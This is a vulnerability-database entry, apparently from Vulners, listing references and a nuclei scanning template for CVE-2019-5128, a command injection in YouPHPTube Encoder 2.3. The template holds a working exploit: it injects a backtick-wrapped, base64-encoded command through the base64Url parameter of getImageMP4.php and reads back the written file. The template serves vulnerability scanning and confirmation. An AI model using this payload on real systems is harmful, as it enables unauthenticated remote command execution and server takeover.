Lucene search
K

YouPHPTube Encoder - Arbitrary File Write

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

YouPHPTube Encoder allows command injection and arbitrary file write due to exploitable URL parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-5128
29 Jan 202409:41
circl
CNVD
YouPHPTube Encoder Operating System Command Injection Vulnerability
28 Oct 201900:00
cnvd
Check Point Advisories
YouPHPTube Encoder Command Injection (CVE-2019-5127; CVE-2019-5128; CVE-2019-5129)
25 Feb 202000:00
checkpoint_advisories
CVE
CVE-2019-5128
25 Oct 201917:12
cve
Cvelist
CVE-2019-5128
25 Oct 201917:12
cvelist
NVD
CVE-2019-5128
25 Oct 201918:15
nvd
Prion
Command injection
25 Oct 201918:15
prion
RedhatCVE
CVE-2019-5128
5 Feb 202517:53
redhatcve
Talos
YouPHPTube Encoder base64Url multiple command injections
17 Oct 201900:00
talos
VulnCheck KEV
VulnCheck KEV: CVE-2019-5128
15 Nov 202300:00
vulncheck_kev
Rows per page
id: CVE-2019-5128

info:
  name: YouPHPTube Encoder - Arbitrary File Write
  author: pussycat0x
  severity: critical
  description: |
    Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands through command injection, leading to complete server compromise and potential access to all media content.
  remediation: |
    Upgrade to YouPHPTube Encoder version 2.4 or later, or apply vendor-provided security patches.
  reference:
    - https://xz.aliyun.com/news/6312
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-5128
    cwe-id: CWE-78
    epss-score: 0.30174
    epss-percentile: 0.97992
    cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: youphptube
    product: youphptube_encoder
    fofa-query: icon_hash="-276846707"
  tags: cve,cve2019,youphptube,intrusive,encoder,vkev,vuln

variables:
  file_name: "{{rand_text_alpha(4)}}.txt"
  content: "id"
  payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'

http:
  - raw:
      - |
        GET /objects/getImageMP4.php?base64Url={{payload}}&format=jpg HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /objects/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201c5f80041fae79cdaccb9466650538acb12365beb507bf59b2f4ec58e34727100221008338bb3e1a612ff618fdb46cf315d6539ac47c88cd93a5762a60b761af88130b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
CVSS 310
EPSS0.30174
21